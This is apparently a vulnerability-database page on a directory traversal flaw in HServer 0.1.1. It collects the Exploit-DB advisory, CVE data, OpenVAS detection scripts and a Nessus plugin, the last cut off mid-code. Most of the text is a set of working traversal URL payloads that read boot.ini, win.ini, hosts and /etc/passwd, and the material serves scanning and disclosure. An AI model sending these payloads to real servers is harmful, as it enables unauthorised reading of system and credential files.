Search...

HServer 0.1.1 Directory Traversal Vulnerability

2012-01-05T00:00:00

ID EDB-ID:36500
Type exploitdb
Reporter demonalex
Modified 2012-01-05T00:00:00

Description

HServer 0.1.1 Directory Traversal Vulnerability. CVE-2012-5100. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/51286/info

HServer web server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.

Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.

HServer 0.1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/..%5c..%5c..%5cboot.ini
http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts

JSON Vulners Source

Initial Source

{"id": "EDB-ID:36500", "hash": "6032153a77e142bbb8622876e1cf0371", "type": "exploitdb", "bulletinFamily": "exploit", "title": "HServer 0.1.1 Directory Traversal Vulnerability", "description": "HServer 0.1.1 Directory Traversal Vulnerability. CVE-2012-5100. Remote exploit for windows platform", "published": "2012-01-05T00:00:00", "modified": "2012-01-05T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/36500/", "reporter": "demonalex", "references": [], "cvelist": ["CVE-2012-5100"], "lastseen": "2016-02-04T03:39:33", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/36500/", "sourceData": "source: http://www.securityfocus.com/bid/51286/info\r\n\r\nHServer web server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.\r\n\r\nExploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.\r\n\r\nHServer 0.1.1 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/..%5c..%5c..%5cboot.ini\r\nhttp://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts\r\nhttp://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini\r\nhttp://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts ", "osvdbidlist": ["82647"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-08-29T12:17:49", "references": ["http://www.securityfocus.com/bid/51286", "http://archives.neohapsis.com/archives/bugtraq/2012-01/0028.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72138"], "edition": 2, "description": "Directory traversal vulnerability in HServer 0.1.1 allows remote attackers to read arbitrary files via a (1) ..%5c (dot dot encoded backslash) or (2) %2e%2e%5c (encoded dot dot backslash) in the PATH_INFO.", "reporter": "NVD", "published": "2012-09-23T13:55:01", "title": "CVE-2012-5100", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-5100"], "scanner": [], "cpe": ["cpe:/a:luizpicanco:hserver:0.1.1"], "modified": "2017-08-28T21:32:29", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5100", "id": "CVE-2012-5100", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2018-10-26T14:46:30", "references": ["https://github.com/lpicanco/hserver", "http://packetstormsecurity.org/files/108376/hserverwebserver-traversal.txt", "http://www.securityfocus.com/archive/1/521119"], "pluginID": "1361412562310802410", "description": "The host is running HServer Webserver and is prone to multiple\n directory traversal vulnerabilities.", "edition": 6, "reporter": "Copyright (C) 2012 Greenbone Networks GmbH", "published": "2012-01-06T00:00:00", "title": "HServer Webserver Multiple Directory Traversal Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5100"], "modified": "2018-10-25T00:00:00", "id": "OPENVAS:1361412562310802410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802410", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hserver_webserver_mult_dir_trav_vuln.nasl 12092 2018-10-25 11:43:33Z cfischer $\n#\n# HServer Multiple Webserver Directory Traversal Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802410\");\n script_version(\"$Revision: 12092 $\");\n script_cve_id(\"CVE-2012-5100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 13:43:33 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-06 13:10:29 +0530 (Fri, 06 Jan 2012)\");\n script_name(\"HServer Webserver Multiple Directory Traversal Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/521119\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/108376/hserverwebserver-traversal.txt\");\n script_xref(name:\"URL\", value:\"https://github.com/lpicanco/hserver\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8081);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_mandatory_keys(\"Host/runs_windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to obtain sensitive\n information that could aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"HServer webserver version 0.1.1\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to improper validation of URI containing\n '..\\..\\' sequences, which allows attackers to read arbitrary files via directory traversal attacks.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is running HServer Webserver and is prone to multiple\n directory traversal vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\n# nb: hServer is not sending any \"Server:\" banner\nport = get_http_port( default:8081 );\n\nfiles = traversal_files( \"Windows\" );\n\nexploits = make_list(\"/..%5c..%5c..%5c\", \"/%2e%2e%5c%2e%2e%5c%2e%2e%5c\");\n\nforeach exploit( exploits ) {\n\n foreach pattern( keys( files ) ) {\n\n file = files[pattern];\n url = exploit + file;\n\n if( http_vuln_check( port:port, url:url, pattern:pattern ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 0 );", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:49", "references": ["https://github.com/lpicanco/hserver", "http://packetstormsecurity.org/files/108376/hserverwebserver-traversal.txt", "http://www.securityfocus.com/archive/1/521119"], "pluginID": "802410", "description": "The host is running HServer Webserver and is prone to multiple\ndirectory traversal vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2012 Greenbone Networks GmbH", "published": "2012-01-06T00:00:00", "title": "HServer Webserver Multiple Directory Traversal Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5100"], "modified": "2017-04-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802410", "id": "OPENVAS:802410", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hserver_webserver_mult_dir_trav_vuln.nasl 5833 2017-04-03 08:45:01Z cfi $\n#\n# HServer Multiple Webserver Directory Traversal Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to obtain sensitive\ninformation that could aid in further attacks.\n\nImpact Level: Application\";\n\ntag_affected = \"HServer webserver version 0.1.1\";\n\ntag_insight = \"The flaws are due to improper validation of URI containing\n'..\\..\\' sequences, which allows attackers to read arbitrary files via\ndirectory traversal attacks.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"The host is running HServer Webserver and is prone to multiple\ndirectory traversal vulnerabilities.\";\n\nif(description)\n{\n script_id(802410);\n script_version(\"$Revision: 5833 $\");\n script_cve_id(\"CVE-2012-5100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-03 10:45:01 +0200 (Mon, 03 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-06 13:10:29 +0530 (Fri, 06 Jan 2012)\");\n script_name(\"HServer Webserver Multiple Directory Traversal Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/521119\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/files/108376/hserverwebserver-traversal.txt\");\n script_xref(name : \"URL\" , value : \"https://github.com/lpicanco/hserver\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 8081);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\n# hServer is not sending any \"Server:\" banner\nport = get_http_port(default:8081);\n\n## Construct attack request\nexploits = make_list(\"/..%5c..%5c..%5cboot.ini\",\n \"/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini\");\n\n## Check for each exploit\nforeach url (exploits)\n{\n ## Try exploit and check the response to confirm vulnerability\n if(http_vuln_check(port:port, url:url, pattern:\"\\[boot loader\\]\"))\n {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-01-16T20:05:11", "references": [], "pluginID": "10297", "description": "It appears possible to read arbitrary files on the remote host outside\nthe web server's document directory using a specially crafted URL. An\nunauthenticated attacker may be able to exploit this issue to access\nsensitive information to aide in subsequent attacks.\n\nNote that this plugin is not limited to testing for known\nvulnerabilities in a specific set of web servers. Instead, it attempts\na variety of generic directory traversal attacks and considers a\nproduct to be vulnerable simply if it finds evidence of the contents\nof '/etc/passwd' or a Windows 'win.ini' file in the response. It may,\nin fact, uncover 'new' issues, that have yet to be reported to the\nproduct's vendor.", "edition": 11, "reporter": "Tenable", "published": "1999-11-05T00:00:00", "title": "Web Server Directory Traversal Arbitrary File Access", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5335", "CVE-2010-3487", "CVE-2010-3460", "CVE-2014-3744", "CVE-2010-3488", "CVE-2012-5100", "CVE-2013-2619", "CVE-2010-3459", "CVE-2012-1464", "CVE-2012-0697", "CVE-2011-4788", "CVE-2008-5315", "CVE-2011-1900", "CVE-2011-2524", "CVE-2012-5641", "CVE-2000-0920", "CVE-2010-3743", "CVE-2013-3304", "CVE-2010-4181", "CVE-2010-1571", "CVE-2012-5344", "CVE-2007-6483"], "modified": "2018-09-17T00:00:00", "cpe": [], "id": "WEB_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10297", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n##############\n# References:\n##############\n#\n# Date: 25 Sep 2002 09:10:45 -0000\n# Message-ID: <20020925091045.29313.qmail@mail.securityfocus.com>\n# From: \"DownBload\" <downbload@hotmail.com>\n# To: bugtraq@securityfocus.com\n# Subject: IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server\n#\n# From: \"David Endler\" <dendler@idefense.com>\n# To:vulnwatch@vulnwatch.org\n# Date: Mon, 23 Sep 2002 16:41:19 -0400\n# Subject: iDEFENSE Security Advisory 09.23.2002: Directory Traversal in Dino's Webserver\n#\n# From:\"UkR security team^(TM)\" <cuctema@ok.ru>\n# Subject: advisory\n# To: bugtraq@securityfocus.com\n# Date: Thu, 05 Sep 2002 16:30:30 +0400\n# Message-ID: <web-29288022@backend2.aha.ru>\n#\n# From: \"Tamer Sahin\" <ts@securityoffice.net>\n# To: bugtraq@securityfocus.com\n# Subject: Web Server 4D/eCommerce 3.5.3 Directory Traversal Vulnerability\n# Date: Tue, 15 Jan 2002 00:36:26 +0200\n# Affiliation: http://www.securityoffice.net\n#\n# From: \"Alex Forkosh\" <aforkosh@techie.com>\n# To: bugtraq@securityfocus.com\n# Subject: Viewing arbitrary file from the file system using Eshare Expressions 4 server\n# Date: Tue, 5 Feb 2002 00:18:42 -0600\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10297);\n script_version(\"1.124\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_cve_id(\n \"CVE-2000-0920\",\n \"CVE-2007-6483\",\n \"CVE-2008-5315\",\n \"CVE-2010-1571\",\n \"CVE-2010-3459\",\n \"CVE-2010-3460\",\n \"CVE-2010-3487\",\n \"CVE-2010-3488\",\n \"CVE-2010-3743\",\n \"CVE-2010-4181\",\n \"CVE-2011-1900\",\n \"CVE-2011-2524\",\n \"CVE-2011-4788\",\n \"CVE-2012-0697\",\n \"CVE-2012-1464\",\n \"CVE-2012-5100\",\n \"CVE-2012-5335\",\n \"CVE-2012-5344\",\n \"CVE-2012-5641\",\n \"CVE-2013-2619\",\n \"CVE-2013-3304\",\n \"CVE-2014-3744\"\n );\n script_bugtraq_id(\n 1770,\n 7308,\n 7362,\n 7378,\n 7544,\n 7715,\n 26583,\n 32412,\n 40053,\n 40133,\n 40680,\n 43230,\n 43258,\n 43356,\n 43358,\n 43830,\n 44393,\n 44564,\n 44586,\n 45599,\n 45603,\n 47760,\n 47842,\n 47987,\n 48114,\n 48926,\n 51286,\n 51311,\n 51399,\n 52327,\n 52384,\n 52541,\n 56871,\n 57143,\n 57313,\n 58794,\n 67389,\n 70760\n );\n script_xref(name:\"EDB-ID\", value:\"24915\");\n script_xref(name:\"EDB-ID\", value:\"33428\");\n script_xref(name:\"EDB-ID\", value:\"35056\");\n\n script_name(english:\"Web Server Directory Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve file outside document directory\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a directory traversal\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"It appears possible to read arbitrary files on the remote host outside\nthe web server's document directory using a specially crafted URL. An\nunauthenticated attacker may be able to exploit this issue to access\nsensitive information to aide in subsequent attacks.\n\nNote that this plugin is not limited to testing for known\nvulnerabilities in a specific set of web servers. Instead, it attempts\na variety of generic directory traversal attacks and considers a\nproduct to be vulnerable simply if it finds evidence of the contents\nof '/etc/passwd' or a Windows 'win.ini' file in the response. It may,\nin fact, uncover 'new' issues, that have yet to be reported to the\nproduct's vendor.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact the vendor for an update, use a different product, or disable\nthe service altogether.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0697\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(22);\nscript_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/11/05\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Web Servers\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\", \"httpver.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\n\ni=0;\nr[i++] = '/' + mult_str(str:'../', nb:12) + 'windows/win.ini';\nr[i++] = '/' + mult_str(str:'../', nb:12) + 'winnt/win.ini';\nr[i++] = mult_str(str:'../', nb:12) + 'windows/win.ini';\nr[i++] = mult_str(str:'../', nb:12) + 'winnt/win.ini';\nr[i++] = '..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini';\nr[i++] = '..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini';\nr[i++] = '/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini';\nr[i++] = '/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini';\nr[i++] = '/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini';\nr[i++] = '/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin.ini';\nr[i++] = '/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini';\nr[i++] = '/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin%2eini';\nr[i++] = '/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini';\nr[i++] = '/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini';\nr[i++] = '/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini';\nr[i++] = '/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini';\nr[i++] = '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini';\nr[i++] = '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini';\nr[i++] = '/%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\windows\\\\win.ini';\nr[i++] = '/%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\winnt\\\\win.ini';\nr[i++] = '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini';\nr[i++] = '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini';\nr[i++] = '/.../.../.../.../.../.../.../.../.../windows/win.ini';\nr[i++] = '/.../.../.../.../.../.../.../.../.../winnt/win.ini';\nr[i++] = '/...\\\\...\\\\...\\\\...\\\\...\\\\...\\\\...\\\\...\\\\...\\\\windows\\\\win.ini';\nr[i++] = '/...\\\\...\\\\...\\\\...\\\\...\\\\...\\\\...\\\\...\\\\...\\\\winnt\\\\win.ini';\nr[i++] = '/..../..../..../..../..../..../..../..../..../windows/win.ini';\nr[i++] = '/..../..../..../..../..../..../..../..../..../winnt/win.ini';\nr[i++] = '/....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\windows\\\\win.ini';\nr[i++] = '/....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\winnt\\\\win.ini';\nr[i++] = '/././././././../../../../../windows/win.ini';\nr[i++] = '/././././././../../../../../winnt/win.ini';\nr[i++] = '.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\/windows/win.ini';\nr[i++] = '.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\.\\\\/winnt/win.ini';\nr[i++] = '/nessus\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini';\nr[i++] = '/nessus\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini';\nr[i++] = '/%80../%80../%80../%80../%80../%80../windows/win.ini';\nr[i++] = '/%80../%80../%80../%80../%80../%80../winnt/win.ini';\nr[i++] = '/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini';\nr[i++] = '/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./winnt/win.ini';\nr[i++] = '/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/win.ini';\nr[i++] = '/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/winnt/win.ini';\nr[i++] = mult_str(str:\"/%uff0e%uff0e\", nb:12) + '/windows/win.ini';\nr[i++] = mult_str(str:\"/%uff0e%uff0e\", nb:12) + '/winnt/win.ini';\n# Some web servers badly parse args under the form /path/file?arg=../../\nr[i++] = '/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini';\nr[i++] = '/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini';\nr[i++] = '/scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini';\nr[i++] = '/scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini';\nr[i++] = 0;\n\ncontents = \"\";\ninfo = \"\";\n\nfor (i=0; r[i]; i++)\n{\n url = r[i];\n if (check_win_dir_trav(port: port, url:url))\n {\n if (url[0] == '/') info += ' - ' + build_url(port: port, qs:url) + '\\n';\n else info += ' - ' + url + ' *\\n';\n\n if (!contents && report_verbosity > 0)\n {\n res = http_send_recv3(port: port, method: 'GET', item:url, exit_on_fail:TRUE);\n if (! isnull(res)) contents = res[2];\n }\n if (!thorough_tests) break;\n }\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 1) s = \"s\";\n else s = \"\";\n\n report = '\\n' +\n 'Nessus was able to retrieve the remote host\\'s \\'win.ini\\' file using the\\n' +\n 'following URL' + s + ' :\\n' +\n '\\n' +\n info;\n\n if (egrep(pattern:\" \\*$\", string:info))\n {\n report += '\\n' +\n '* Note that this requires sending an HTTP GET request without the\\n' +\n ' leading forward slash to the web server at ' + build_url(port:port, qs:'/') + ',\\n' +\n ' which is not supported by most web browsers.\\n';\n }\n\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n report += '\\n' +\n 'Here are the contents :\\n' +\n '\\n' +\n crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n' +\n chomp(contents) + '\\n' +\n crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n if (!thorough_tests)\n report +=\n '\\n' +\n 'Note that Nessus stopped searching after one exploit was found. To\\n' +\n 'report all known exploits, enable the \\'Perform thorough tests\\'\\n' +\n 'setting and re-scan.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n set_kb_item(name: strcat(\"www/\", port, \"/generic_traversal\"), value: TRUE);\n exit(0);\n}\n\ni=0;\nr[i++] = '/' + mult_str(str:'../', nb:12) + 'etc/passwd';\nr[i++] = mult_str(str:'../', nb:12) + 'etc/passwd';\nr[i++] = '//' + mult_str(str:'../', nb:12) + 'etc/passwd';\nr[i++] = mult_str(str:'/....', nb:12) + '/etc/passwd';\nr[i++] = mult_str(str:'/%2e%2e', nb:12) + '/etc/passwd';\nr[i++] = '/' + mult_str(str:'..%2f', nb:12) + 'etc/passwd';\nr[i++] = mult_str(str:'..%2f', nb:12) + 'etc/passwd';\nr[i++] = '/' + mult_str(str:'%2e%2e%2f', nb:12) + 'etc/passwd';\nr[i++] = '/././././././../../../../../etc/passwd';\nr[i++] = mult_str(str:\"/%uff0e%uff0e\", nb:12) + '/etc/passwd';\n# Some web servers badly parse args under the form /path/file?arg=../../\nr[i++] = '/scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd';\nr[i++] = '/scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd';\nif (thorough_tests || report_paranoia >= 2)\n{\n # An old bug (06 Jan 2003) in CommunigatePro. Note the *//\n r[i++] = '/DomainFiles/*//../../../../../../etc/passwd';\n}\nr[i++] = 0;\n\ncontents = \"\";\ninfo = \"\";\n\nfor (i = 0; r[i]; i++)\n{\n url = r[i];\n\n # nb: at least one web server ('st') fails to respond at all if the URL does \n # not have a leading slash.\n if (url[0] = '/') exit_on_fail = TRUE;\n else exit_on_fail = FALSE;\n res = http_send_recv3(port: port, method: 'GET', item:url, exit_on_fail:exit_on_fail);\n if (isnull(res)) continue;\n\n if (egrep(pattern: 'root:.*:0:[01]:', string: res[2]))\n {\n if (url[0] == '/') info += ' - ' + build_url(port: port, qs:url) + '\\n';\n else info += ' - ' + url + ' *\\n';\n\n if (!contents && report_verbosity > 0)\n {\n contents = res[2];\n }\n if (!thorough_tests) break;\n }\n}\n\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 1) s = \"s\";\n else s = \"\";\n\n report = '\\n' +\n 'Nessus was able to retrieve the remote host\\'s password file using the\\n' +\n 'following URL' + s + ' :\\n' +\n '\\n' +\n info;\n\n if (egrep(pattern:\" \\*$\", string:info))\n {\n report += '\\n' +\n '* Note that this requires sending an HTTP GET request without the\\n' +\n ' leading forward slash to the web server at ' + build_url(port:port, qs:'/') + ',\\n' +\n ' which is not supported by most web browsers.\\n';\n }\n\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n report += '\\n' +\n 'Here are the contents :\\n' +\n '\\n' +\n crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n' +\n contents +\n crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) 